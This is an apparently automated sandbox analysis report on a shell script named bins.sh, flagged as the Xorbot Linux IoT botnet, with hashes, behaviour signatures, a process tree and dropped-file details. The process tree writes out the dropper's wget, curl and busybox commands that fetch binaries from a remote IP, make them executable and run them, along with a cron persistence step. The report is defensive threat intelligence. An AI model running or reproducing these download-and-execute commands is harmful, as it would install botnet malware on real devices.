Analysis

  • max time kernel
    149s
  • max time network
    161s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240611-en
  • resource tags

    arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
  • submitted
    20-02-2025 18:33

General

  • Target

    bins.sh

  • Size

    10KB

  • MD5

    1a818bb63a3306ae460a32c139410128

  • SHA1

    a25809c8e4858f91c10123448406631554ab739d

  • SHA256

    3a6cdf4d9eb0d91dc2125de430207fc449a34acb22787078b19b11df5b42ae32

  • SHA512

    3e47969ff983b506139c03ef59f55f7e5983ca8cb590dd0ad4d1c1a62bd6b174ab3aaf1e6f605f07e037b8a7b7f866466ebee7438a93ff86c1b00aeb79997caa

  • SSDEEP

    192:fipgN2oT7Udx7DLs5NzO/IT7UdxTDLs5NmA:fqgN20O/A

Malware Config

Signatures

  • Detects Xorbot 2 IoCs
  • Xorbot

    Xorbot is a linux botnet and trojan targeting IoT devices.

  • Xorbot family
  • Contacts a large (1295) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • File and Directory Permissions Modification 1 TTPs 4 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 4 IoCs
  • Renames itself 1 IoCs
  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates/modifies Cron job 1 TTPs 1 IoCs

    Cron allows running tasks on a schedule, and is commonly used for malware persistence.

  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Checks CPU configuration 1 TTPs 4 IoCs

    Checks CPU information which indicate if the system is a virtual machine.

  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 12 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/bins.sh
    /tmp/bins.sh
    1⤵
    • Executes dropped EXE
    PID:658
    • /bin/rm
      /bin/rm bins.sh
      2⤵
        PID:662
      • /usr/bin/wget
        wget http://37.44.238.88/bins/2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
        2⤵
        • Writes file to tmp directory
        PID:666
      • /usr/bin/curl
        curl -O http://37.44.238.88/bins/2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
        2⤵
        • Checks CPU configuration
        • Reads runtime system information
        • Writes file to tmp directory
        PID:688
      • /bin/busybox
        /bin/busybox wget http://37.44.238.88/bins/2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
        2⤵
        • Writes file to tmp directory
        PID:689
      • /bin/chmod
        chmod 777 2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
        2⤵
        • File and Directory Permissions Modification
        PID:690
      • /tmp/2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
        ./2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
        2⤵
          PID:691
        • /bin/rm
          rm 2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
          2⤵
            PID:693
          • /usr/bin/wget
            wget http://37.44.238.88/bins/MOCJUczo8nGNpJfrIY0AcgPyu9i8Dikbly
            2⤵
            • Writes file to tmp directory
            PID:695
          • /usr/bin/curl
            curl -O http://37.44.238.88/bins/MOCJUczo8nGNpJfrIY0AcgPyu9i8Dikbly
            2⤵
            • Checks CPU configuration
            • Reads runtime system information
            • Writes file to tmp directory
            PID:701
          • /bin/busybox
            /bin/busybox wget http://37.44.238.88/bins/MOCJUczo8nGNpJfrIY0AcgPyu9i8Dikbly
            2⤵
            • Writes file to tmp directory
            PID:709
          • /bin/chmod
            chmod 777 MOCJUczo8nGNpJfrIY0AcgPyu9i8Dikbly
            2⤵
            • File and Directory Permissions Modification
            PID:713
          • /tmp/MOCJUczo8nGNpJfrIY0AcgPyu9i8Dikbly
            ./MOCJUczo8nGNpJfrIY0AcgPyu9i8Dikbly
            2⤵
              PID:714
            • /bin/rm
              rm MOCJUczo8nGNpJfrIY0AcgPyu9i8Dikbly
              2⤵
                PID:716
              • /usr/bin/wget
                wget http://37.44.238.88/bins/YcomTvX4W8BssPdS8PdsReJtx3lxInKPUb
                2⤵
                • Writes file to tmp directory
                PID:718
              • /usr/bin/curl
                curl -O http://37.44.238.88/bins/YcomTvX4W8BssPdS8PdsReJtx3lxInKPUb
                2⤵
                • Checks CPU configuration
                • Writes file to tmp directory
                PID:724
              • /bin/busybox
                /bin/busybox wget http://37.44.238.88/bins/YcomTvX4W8BssPdS8PdsReJtx3lxInKPUb
                2⤵
                • Writes file to tmp directory
                PID:731
              • /bin/chmod
                chmod 777 YcomTvX4W8BssPdS8PdsReJtx3lxInKPUb
                2⤵
                • File and Directory Permissions Modification
                PID:736
              • /tmp/YcomTvX4W8BssPdS8PdsReJtx3lxInKPUb
                ./YcomTvX4W8BssPdS8PdsReJtx3lxInKPUb
                2⤵
                  PID:737
                • /bin/rm
                  rm YcomTvX4W8BssPdS8PdsReJtx3lxInKPUb
                  2⤵
                    PID:739
                  • /usr/bin/wget
                    wget http://37.44.238.88/bins/yx74yC70BPNRupZxWKJQjp7t3psl2zVIky
                    2⤵
                    • Writes file to tmp directory
                    PID:741
                  • /usr/bin/curl
                    curl -O http://37.44.238.88/bins/yx74yC70BPNRupZxWKJQjp7t3psl2zVIky
                    2⤵
                    • Checks CPU configuration
                    • Writes file to tmp directory
                    PID:754
                  • /bin/busybox
                    /bin/busybox wget http://37.44.238.88/bins/yx74yC70BPNRupZxWKJQjp7t3psl2zVIky
                    2⤵
                    • Writes file to tmp directory
                    PID:755
                  • /bin/chmod
                    chmod 777 yx74yC70BPNRupZxWKJQjp7t3psl2zVIky
                    2⤵
                    • File and Directory Permissions Modification
                    PID:756
                  • /tmp/yx74yC70BPNRupZxWKJQjp7t3psl2zVIky
                    ./yx74yC70BPNRupZxWKJQjp7t3psl2zVIky
                    2⤵
                    • Renames itself
                    • Reads runtime system information
                    PID:757
                    • /bin/sh
                      sh -c "crontab -l"
                      3⤵
                        PID:759
                        • /usr/bin/crontab
                          crontab -l
                          4⤵
                            PID:760
                        • /bin/sh
                          sh -c "crontab -"
                          3⤵
                            PID:761
                            • /usr/bin/crontab
                              crontab -
                              4⤵
                              • Creates/modifies Cron job
                              PID:762
                        • /bin/rm
                          rm yx74yC70BPNRupZxWKJQjp7t3psl2zVIky
                          2⤵
                            PID:774
                          • /usr/bin/wget
                            wget http://37.44.238.88/bins/d8uMKkIThz9CehhDHDY592Zika7W5IuduA
                            2⤵
                              PID:778

                          Network

                          MITRE ATT&CK Enterprise v15

                          Replay Monitor

                          Loading Replay Monitor...

                          Downloads

                          • /tmp/2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo

                            Filesize

                            151KB

                            MD5

                            6c583043d91c55aa470c08c87058e917

                            SHA1

                            abf65a5b9bba69980278ad09356e53de8bb89439

                            SHA256

                            2d63c81a782853efe672a1d9cb00a339ec57207b4075754a1baf1df9af466948

                            SHA512

                            82ee5f3884edc2cb3e68d8634353964cdb991e250b0592a2f80f5ffb738e64860abe6d030aec0d6ab94596c275b478080579fd65b055cc9055e1ef3de6dd59a5

                          • /tmp/MOCJUczo8nGNpJfrIY0AcgPyu9i8Dikbly

                            Filesize

                            111KB

                            MD5

                            701e7a55a4f3650f5feee92a9860e5fc

                            SHA1

                            6ce4a7f0dc80fe557a0ace4de25e6305af221ed4

                            SHA256

                            ff851250b0bd7e6f2c445b08d858d840b554caf75a37ada2a970ea4d317ba588

                            SHA512

                            7352517b4af3b0cfe1cc814accf18e6254532f33dee274279bd499b6748aa0ed044c9429d6df0eb07ff0292cd0f9388ce44d278e0c562e6e57110b28a66a5f11

                          • /tmp/YcomTvX4W8BssPdS8PdsReJtx3lxInKPUb

                            Filesize

                            99KB

                            MD5

                            9438d9bc392bcf300a5583b6df5bc8f6

                            SHA1

                            375a6ae34b516f6f3eeea8030c4084f585017efa

                            SHA256

                            68e6282ed9046c9e22dbdf051dc03956803a46805f599e8cb9b52b993caa8f1e

                            SHA512

                            1f3e4219359a28c0f6373c0369da2b5dc0e89789afb89664627d8d9e37d4b72da36322b4015491d7daa03e46dff07d39f00dca18f274e9623dab0ff2d869c860

                          • /tmp/yx74yC70BPNRupZxWKJQjp7t3psl2zVIky

                            Filesize

                            177KB

                            MD5

                            786d75a158fe731feca3880f436082c0

                            SHA1

                            79ea2734e43d00cdeabed5586b2c1994d02aef3e

                            SHA256

                            5fb5b9beb44997a6d1baf950a8bf05b94aa59406d82ba2fea27eb13c497d4b18

                            SHA512

                            7984ebc874563267570f828ee158e4860971e184900e3590ac3b4829285443e065dd1ad4df190ceabf575880a4cd8ead4dd1132e9c1650239accf3f6440a3f7f

                          • /var/spool/cron/crontabs/tmp.hxzQtQ

                            Filesize

                            210B

                            MD5

                            9df7dc0d3c10dd701e51c3b1782a720b

                            SHA1

                            a9899584c1e6e6a9f560d6e41f94237b57802539

                            SHA256

                            984e06c4a7404fffc6d8f47bd60aaf3826a84d4b7ac9026755acb15ff78be076

                            SHA512

                            f969400e262ecc8ffc7de6db3633bb645da244382f09ef613fb707fd30afe3f8e87a9381c9bc31589c911aac9b34e0a20367c788ad141f2785612672272bec02